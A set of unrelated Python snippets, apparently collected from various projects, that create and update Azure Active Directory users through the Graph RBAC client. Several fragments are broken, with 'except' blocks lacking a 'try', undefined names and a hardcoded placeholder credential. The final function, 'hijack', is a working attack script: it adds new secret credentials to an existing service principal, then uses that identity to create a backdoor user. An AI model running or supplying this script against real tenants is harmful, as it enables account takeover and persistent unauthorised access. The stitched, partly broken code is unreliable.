def run(self, user_object_id, password, force_password_change):
self.graphrbac_client.users.update(
user_object_id, {
'passwordProfile':
PasswordProfile(
password=password,
force_change_password_next_login=force_password_change)
})
return {"updated": True}
def create(self):
self.user = self.client.users.create(
UserCreateParameters(user_principal_name=self.user_principal_name,
account_enabled=True,
display_name=self.display_name,
mail_nickname=self.mail_nickname,
password_profile=PasswordProfile(
password=self.password,
force_change_password_next_login=False)),
verify=self.verify)
def create_user(client, user_principal_name, display_name, password, mail_nickname=None, #pylint: disable=too-many-arguments
immutable_id=None, force_change_password_next_login=False):
'''
:param mail_nickname: mail alias. default to user principal name
'''
mail_nickname = mail_nickname or user_principal_name.split('@')[0]
param = UserCreateParameters(user_principal_name=user_principal_name, account_enabled=True,
display_name=display_name, mail_nickname=mail_nickname,
immutable_id=immutable_id,
password_profile=PasswordProfile(
password, force_change_password_next_login))
return client.create(param)
def run(self, user_principal_name, account_enabled, display_name,
mail_nickname, password, force_password_change):
user = self.graphrbac_client.users.create(
UserCreateParameters(
user_principal_name=user_principal_name,
account_enabled=account_enabled,
display_name=display_name,
mail_nickname=mail_nickname,
password_profile=PasswordProfile(
password=password,
force_change_password_next_login=force_password_change)))
return {"user": user.__dict__}
def main():
credentials = UserPassCredentials(mailadmin,
passwordadmin,
resource="https://graph.windows.net")
graphrbac_client = GraphRbacManagementClient(credentials, tenantid)
param = UserUpdateParameters(password_profile=PasswordProfile(
password=newpassword, force_change_password_next_login=False))
user = graphrbac_client.users.update(mail, param)
def inviteUser(email, configMap, allPermissions, plugin_tag, name):
groups = getCLIgroups(configMap, plugin_tag, allPermissions)
for plugin in configMap['plugins']:
if plugin['plugin'] + ':' + plugin['tag'] == plugin_tag:
azureConfig = plugin
log = 'Azure: ' + email[:-13] + ' added to ' + azureConfig[
"directory"] + '.\n'
instruction = inviteMessage(configMap, plugin_tag).replace(
"<username>", email[:-13] + "@{}".format(azureConfig["directory"]))
pw = 'Ab1' + ''.join(
random.choices(
string.ascii_uppercase + string.ascii_lowercase + string.digits,
k=13))
credentialsToken = UserPassCredentials(
azureConfig['email'], # new user
azureConfig["password"],
resource="https://graph.windows.net")
graphrbac_client = GraphRbacManagementClient(credentialsToken,
azureConfig["directory"])
try:
user = graphrbac_client.users.create(
UserCreateParameters(user_principal_name=email[:-13] +
"@{}".format(azureConfig["directory"]),
account_enabled=True,
display_name=name,
mail_nickname=email[:-13],
password_profile=PasswordProfile(
password=pw,
force_change_password_next_login=True)))
url = azureConfig['url'] + user.object_id
groupIDs = []
azureGroups = graphrbac_client.groups.list()
for group in groups:
for azureGroup in azureGroups:
if group == azureGroup.display_name:
groupIDs.append(azureGroup.object_id)
for groupId in groupIDs:
addGroup = graphrbac_client.groups.add_member(groupId, url)
except:
log = 'Azure: failed to add, ' + email + ', user already exists .\n'
instruction = email + ' already exists.'
return getJsonResponse("Azure Active Directory", email, log, instruction)
def add_entry(self, entry_id):
new_entry = self.client.users.create(
UserCreateParameters(
user_principal_name=str(entry_id) + "@{}".format(self.tenant_id),
account_enabled=True,
display_name=str(entry_id),
mail_nickname=str(entry_id),
password_profile=PasswordProfile(
password=str(get_password()),
force_change_password_next_login=True
)
)
)
return new_entry
credentials = UserPassCredentials('*****@*****.**',
'mypassword',
resource="https://graph.windows.net")
except:
timevar = time.strftime('%d/%m/%y %H:%M:%S', time.localtime())
varloggaps = '%s ERROR: Fail connexion credentials. Mail : %s \n \n' % (
timevar, email)
fichier = open("/var/log/azurelog.log", "a")
fichier.write(varloggaps)
fichier.close()
tenant_id = "e53e167a-e2bc-40ef-9b3f-fd6e9f999999"
graphrbac_client = GraphRbacManagementClient(credentials, tenant_id)
param = UserUpdateParameters(password_profile=PasswordProfile(
password=newpassword, force_change_password_next_login=False))
try:
timevar = time.strftime('%d/%m/%y %H:%M:%S', time.localtime())
varloggaps = '%s INFO: send password for Mail : %s \n \n' % (timevar,
email)
fichier = open("/var/log/azurelog.log", "a")
fichier.write(varloggaps)
fichier.close()
user = graphrbac_client.users.update(email, param)
os.remove('/password/office365/%s' % login)
except:
timevar = time.strftime('%d/%m/%y %H:%M:%S', time.localtime())
varloggaps = '%s ERROR: Fail send password. Mail : %s \n \n' % (timevar,
email)
def _password_profile(config):
return PasswordProfile(password=config['default_password'],
force_change_password_next_login=True)
def hijack(username, password, tenant_id, service_principal_id):
domain = username.split('@')[1]
# Step 0 - authenticate
logging.info('Authenticating to Azure with the provided credentials')
graphrbac_credentials = UserPassCredentials(
username, password, resource='https://graph.windows.net')
client = GraphRbacManagementClient(graphrbac_credentials,
tenant_id=tenant_id)
# Step 1 - get the desired service principal
logging.info('Looking for the desired service principal')
found = False
for s in list(client.service_principals.list()):
if s.app_id == service_principal_id:
logging.info('Found it - hijacking {} ({})'.format(
s.app_display_name, s.app_id))
found = True
break
if not found:
logging.error('Did not find service principal, exiting')
return
service_principal = client.service_principals.get(object_id=s.object_id)
# Step 2 - create new credentials for the service principal
logging.info('Creating new credentials for {}'.format(s.app_display_name))
sp_password = '******'
new_password = PasswordCredential(
value=sp_password,
start_date=(datetime.today() - timedelta(days=1)),
end_date=(datetime.today() + timedelta(days=365)))
client.service_principals.update_password_credentials(
object_id=service_principal.object_id, value=[new_password])
logging.info('Set password \"{}\"'.format(sp_password))
hijacked_credentials = ServicePrincipalCredentials(
client_id=s.app_id,
secret=new_password.value,
tenant=tenant_id,
resource='https://graph.windows.net')
# Step 3 - create a new user with the hijacked service principal credentials
logging.info('Using hijacked service principal to create a new user')
client = GraphRbacManagementClient(hijacked_credentials,
tenant_id=tenant_id)
random_uuid = uuid.uuid4()
user_name = 'test-{}'.format(random_uuid)
user_password = '******'
new_user_password = PasswordProfile(password=user_password)
logging.info('Creating user {} with password \"{}\"'.format(
user_name, user_password))
new_user_parameters = UserCreateParameters(
account_enabled=True,
display_name=user_name,
user_principal_name='{}@{}'.format(random_uuid, domain),
mail_nickname=user_name,
password_profile=new_user_password)
new_user_created = client.users.create(new_user_parameters)
logging.info('Done')